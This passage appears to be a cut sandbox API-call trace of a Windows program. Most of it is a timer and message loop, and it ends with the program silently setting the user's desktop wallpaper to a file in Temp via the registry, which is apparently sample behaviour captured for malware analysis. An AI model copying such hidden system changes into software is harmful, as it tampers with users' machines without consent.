wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.581] Sleep (dwMilliseconds=0xa) [0282.594] timeGetTime () returned 0x46b6e [0282.594] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.594] Sleep (dwMilliseconds=0xa) [0282.623] timeGetTime () returned 0x46b7d [0282.623] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.623] Sleep (dwMilliseconds=0xa) [0282.625] timeGetTime () returned 0x46b8d [0282.625] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.625] Sleep (dwMilliseconds=0xa) [0282.641] timeGetTime () returned 0x46b9d [0282.641] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.641] Sleep (dwMilliseconds=0xa) [0282.657] timeGetTime () returned 0x46bac [0282.657] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.657] Sleep (dwMilliseconds=0xa) [0282.674] timeGetTime () returned 0x46bbc [0282.674] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.674] Sleep (dwMilliseconds=0xa) [0282.688] timeGetTime () returned 0x46bcb [0282.688] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.688] Sleep (dwMilliseconds=0xa) [0282.705] timeGetTime () returned 0x46bdb [0282.705] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.705] Sleep (dwMilliseconds=0xa) [0282.719] timeGetTime () returned 0x46beb [0282.719] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.719] Sleep (dwMilliseconds=0xa) [0282.735] timeGetTime () returned 0x46bfa [0282.735] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.735] Sleep (dwMilliseconds=0xa) [0282.750] timeGetTime () returned 0x46c0a [0282.750] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.750] Sleep (dwMilliseconds=0xa) [0282.767] timeGetTime () returned 0x46c19 [0282.767] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0282.767] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0282.767] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0282.767] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0282.767] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0282.767] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.767] Sleep (dwMilliseconds=0xa) [0282.782] timeGetTime () returned 0x46c29 [0282.782] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.782] Sleep (dwMilliseconds=0xa) [0282.797] timeGetTime () returned 0x46c39 [0282.797] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.797] Sleep (dwMilliseconds=0xa) [0282.832] timeGetTime () returned 0x46c58 [0282.832] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.835] Sleep (dwMilliseconds=0xa) [0282.844] timeGetTime () returned 0x46c67 [0282.844] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.844] Sleep (dwMilliseconds=0xa) [0282.860] timeGetTime () returned 0x46c77 [0282.860] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.860] Sleep (dwMilliseconds=0xa) [0282.876] timeGetTime () returned 0x46c87 [0282.876] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.876] Sleep (dwMilliseconds=0xa) [0282.891] timeGetTime () returned 0x46c96 [0282.891] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.891] Sleep (dwMilliseconds=0xa) [0282.906] timeGetTime () returned 0x46ca6 [0282.907] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.907] Sleep (dwMilliseconds=0xa) [0282.922] timeGetTime () returned 0x46cb5 [0282.922] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.922] Sleep (dwMilliseconds=0xa) [0282.938] timeGetTime () returned 0x46cc5 [0282.938] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.938] Sleep (dwMilliseconds=0xa) [0282.960] timeGetTime () returned 0x46cd5 [0282.960] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.960] Sleep (dwMilliseconds=0xa) [0282.969] timeGetTime () returned 0x46ce4 [0282.969] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.969] Sleep (dwMilliseconds=0xa) [0282.985] timeGetTime () returned 0x46cf4 [0282.985] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.985] Sleep (dwMilliseconds=0xa) [0283.000] timeGetTime () returned 0x46d03 [0283.000] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.000] Sleep (dwMilliseconds=0xa) [0283.017] timeGetTime () returned 0x46d13 [0283.018] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.018] Sleep (dwMilliseconds=0xa) [0283.033] timeGetTime () returned 0x46d23 [0283.033] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.033] Sleep (dwMilliseconds=0xa) [0283.047] timeGetTime () returned 0x46d32 [0283.047] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.047] Sleep (dwMilliseconds=0xa) [0283.062] timeGetTime () returned 0x46d42 [0283.062] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.062] Sleep (dwMilliseconds=0xa) [0283.078] timeGetTime () returned 0x46d51 [0283.078] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.078] Sleep (dwMilliseconds=0xa) [0283.126] timeGetTime () returned 0x46d80 [0283.126] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.126] Sleep (dwMilliseconds=0xa) [0283.187] timeGetTime () returned 0x46dbf [0283.188] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.188] Sleep (dwMilliseconds=0xa) [0283.237] timeGetTime () returned 0x46ded [0283.237] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.237] Sleep (dwMilliseconds=0xa) [0283.250] timeGetTime () returned 0x46dfd [0283.250] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.250] Sleep (dwMilliseconds=0xa) [0283.265] timeGetTime () returned 0x46e0d [0283.265] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.266] Sleep (dwMilliseconds=0xa) [0283.281] timeGetTime () returned 0x46e1c [0283.281] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.281] Sleep (dwMilliseconds=0xa) [0283.297] timeGetTime () returned 0x46e2c [0283.297] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.297] Sleep (dwMilliseconds=0xa) [0283.312] timeGetTime () returned 0x46e3b [0283.312] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.312] Sleep (dwMilliseconds=0xa) [0283.328] timeGetTime () returned 0x46e4b [0283.328] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.328] Sleep (dwMilliseconds=0xa) [0283.344] timeGetTime () returned 0x46e5b [0283.344] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.344] Sleep (dwMilliseconds=0xa) [0283.359] timeGetTime () returned 0x46e6a [0283.359] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.359] Sleep (dwMilliseconds=0xa) [0283.374] timeGetTime () returned 0x46e7a [0283.375] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.375] Sleep (dwMilliseconds=0xa) [0283.390] timeGetTime () returned 0x46e89 [0283.390] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.390] Sleep (dwMilliseconds=0xa) [0283.406] timeGetTime () returned 0x46e99 [0283.406] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.406] Sleep (dwMilliseconds=0xa) [0283.422] timeGetTime () returned 0x46ea9 [0283.422] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.422] Sleep (dwMilliseconds=0xa) [0283.437] timeGetTime () returned 0x46eb8 [0283.437] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.437] Sleep (dwMilliseconds=0xa) [0283.452] timeGetTime () returned 0x46ec8 [0283.453] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.453] Sleep (dwMilliseconds=0xa) [0283.469] timeGetTime () returned 0x46ed7 [0283.469] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.469] Sleep (dwMilliseconds=0xa) [0283.486] timeGetTime () returned 0x46ee7 [0283.486] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.486] Sleep (dwMilliseconds=0xa) [0283.500] timeGetTime () returned 0x46ef7 [0283.500] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.500] Sleep (dwMilliseconds=0xa) [0283.516] timeGetTime () returned 0x46f06 [0283.516] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.516] Sleep (dwMilliseconds=0xa) [0283.531] timeGetTime () returned 0x46f16 [0283.532] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0283.532] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0283.532] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0283.532] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0283.532] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0283.532] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.532] Sleep (dwMilliseconds=0xa) [0283.547] timeGetTime () returned 0x46f25 [0283.547] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.547] Sleep (dwMilliseconds=0xa) [0283.562] timeGetTime () returned 0x46f35 [0283.562] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0283.562] Sleep (dwMilliseconds=0xa) [0283.577] timeGetTime () returned 0x46f45 [0283.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0283.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0283.578] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0283.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0283.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0283.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0283.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0283.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0283.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0283.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0283.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0283.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0283.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0283.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0283.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0283.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0283.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0283.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0283.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0283.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0283.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0283.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0283.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0283.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0283.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0283.580] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0283.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0283.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0283.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0283.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0283.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0283.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0283.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0283.581] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0283.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0283.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0283.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0283.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0283.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0283.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0283.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0283.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0283.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0283.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0283.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0283.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0283.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0283.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0283.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0283.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0283.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0283.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0283.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0283.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0283.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0283.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0283.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0283.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0283.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0283.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0283.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0283.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0283.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0283.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0283.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0283.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0283.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0283.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0283.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0283.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0283.585] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0283.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0283.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0283.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0283.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0283.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0283.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0283.586] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0283.586] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0283.586] RegCloseKey (hKey=0x294) returned 0x0 [0283.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0283.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0283.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0283.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0283.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0283.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0283.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0283.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0283.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0283.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0283.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0283.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0283.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0283.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: 